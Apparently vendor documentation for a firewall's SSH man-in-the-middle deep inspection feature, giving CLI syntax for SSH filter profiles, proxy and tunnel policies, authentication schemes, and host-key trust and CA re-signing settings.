SSH MITM deep inspection
As vulnerabilities of OpenSSH continue to be exposed, it has become necessary to detect such attacks, which requires the ability to decrypt the SSH tunnel to check the data. This feature introduces comprehensive security controls on SSH Man-in-the-Middle (MITM) deep inspections, including:
- SSH filter profiles to control SSH tunnel types and filtering on SSH shell commands.
- SSH proxy policies to apply a proxy firewall policy with user authentication on SSH session.
- Support for SSH tunnel policy to perform access control for TCP/IP port forwarding traffic that is tunneled through the SSH proxy. IPS scanning can be applied to the tunneled traffic.
- Support for SSH trust to detect and prevent SSH MITM attacks.
Syntax
- Add SSH related option in ssl-ssh-profile for proxy mode profile
- Add option to bypass or block unsupported SSH protocol (Deep scan only supports SSH 2.0)
config firewall ssl-ssh-profile
edit <name>
config ssh
set unsupported-version {bypass | block}
next
end
end
- Add option to enable SSH proxy policy check
config firewall ssl-ssh-profile
edit <name>
config ssh
set ssh-policy-check {enable | disable}
set ssh-tun-policy-check {enable | disable}
next
end
end
When SSH proxy policy check is enabled, proxy will check "SSH proxy" policy for SSH traffic and check "SSH tunnel" policy for TCP/IP port forwarding traffic.
- Move block/log options for
x11-filter/ssh-shell/exec/port-forwardto SSH filter profile
- Add option to bypass or block unsupported SSH protocol (Deep scan only supports SSH 2.0)
- SSH filter profile
- Support options to block or log
x11-filter/ssh-shell/exec/port-forward/sftpconfig ssh-filter profile
edit <name>
set block {x11-filter | ssh-shell | exec | port-forward | sftp}
set log {x11-filter | ssh-shell | exec | port-forward | sftp}
next
end
- Add Shell command filters
config ssh-filter profile
edit <name>
config shell-commands
edit <id>
set type {simple | regex}
set pattern <cmd-string>
set action {block | allow}
set log {enable | disable}
set alert {enable | disable}
set severity {low | medium | high | critical}
next
end
set default-command-log {enable | disable}
end
- Support options to block or log
- Allow SSH filter profile to be set for
config firewall policywhen UTM is enabled. - Support SSH proxy policy for SSH sessions
- Add a proxy type
sshintoconfig firewall proxy-policyconfig firewall proxy-policy
edit <pol-id>
set proxy ssh
next
end
- When
user/user-groupis set in SSH proxy policy, firewall authentication can be done for SSH proxy traffic. Authentication rule for SSH is added:config authentication rule
edit <name>
set protocol ssh
next
end
"Basic" authentication scheme:
config authentication scheme
edit "ssh-active"
set method basic
set user-database "local" #or LDAP server
next
"ssh-publickey" authentication scheme:
config authentication scheme
edit "ssh-pkey"
set method ssh-publickey
set user-database "local" #or LDAP server
set ssh-ca "server-ca"
next
User name is embedded in ssh-publickey. User group information will be retrieved if the publickey is validated by CA.
Both "Basic" and "ssh-publickey" authentication scheme:
config authentication scheme
edit "ssh-pkey"
set method basic ssh-publickey
set user-database "local" #or LDAP server
set ssh-ca "server-ca"
next
- Add a proxy type
- Support SSH tunnel policy to do access control for TCP/IP port forwarding traffic.
- Add a proxy type
ssh-tunnelintoconfig firewall proxy-policyconfig firewall proxy-policy
edit <pol-id>
set proxy ssh-tunnel
set action {accept | deny}
next
end
- Support allow or deny and IPS sensor/app-control the traffic.
- Add a proxy type
- Support SSH trust to detect and prevent from SSH MITM attacks
- Define trusted SSH hostkey for specific SSH server
config firewall ssh host-key
edit <name>
set status {trusted | revoked}
set type {RSA | DSS | ECDSA}
set nid <NID of ECDSA key>
set ip <ip>
set port <port>
set hostname <name>
set public-key <hostkey>
next
end
- Define trusted/untrusted CAs for hostkey signing. Any hostkey signed by trust CA is trusted unless the hostkey is revoked.
config firewall ssh local-ca
edit <name>
set password <passwd>
set public-key <public key>
set private-key <private key>
set source {build-in | user}
next
end
The system creates two build-in SSH CAs: Fortinet_SSH_CA and Fortinet_SSH_CA_Untrusted. The CAs are used to re-sign a server host key with local host-key using trusted/untrusted CA when the server host key is trusted or untrusted.
- Define local hostkey templates for trusted re-signing. Be default, they are generated automatically.
config firewall ssh local-key
edit <name>
set password <passwd>
set public-key <public key>
set private-key <private key>
set source {build-in | user}
next
end
The system creates different types of local host keys as default re-signing templates: Fortinet_SSH_RSA2048, Fortinet_SSH_DSA1024, Fortinet_SSH_ECDSA256, Fortinet_SSH_ECDSA384, Fortinet_SSH_ECDSA512, Fortinet_SSH_ED25519, Fortinet_SSH_RSA1024.
Admin can load their own local host keys and use them for MITM re-signing in
config firewall ssh setting. - Per-VDOM SSH settings
config firewall ssh setting
set caname <trusted-ca>
set untrusted-caname <untrusted-ca>
set hostkey-rsa <hostkey-rsa>
set hostkey-dss <hostkey-dss>
set hostkey-ecdsa256 <hostkey-ecdsa256>
set hostkey-ecdsa384 <hostkey-ecdsa384>
set ed25519-key <ed25519-key>
set host-trusted-check {enable | disble}
end
When a hostkey is trusted and signed by a CA, SSH proxy re-signs appropriate type of hostkey using trusted CA.
When a host is trusted but not signed, SSH proxy sends back appropriate type of hostkey.
When a hostkey is untrusted and signed by a CA, SSH proxy re-signs a temporary hostkey (1 hour life time) using untrused CA.
When a host is trusted but not signed, SSH proxy sends back a temporary hostkey (one hour life time).
- Define trusted SSH hostkey for specific SSH server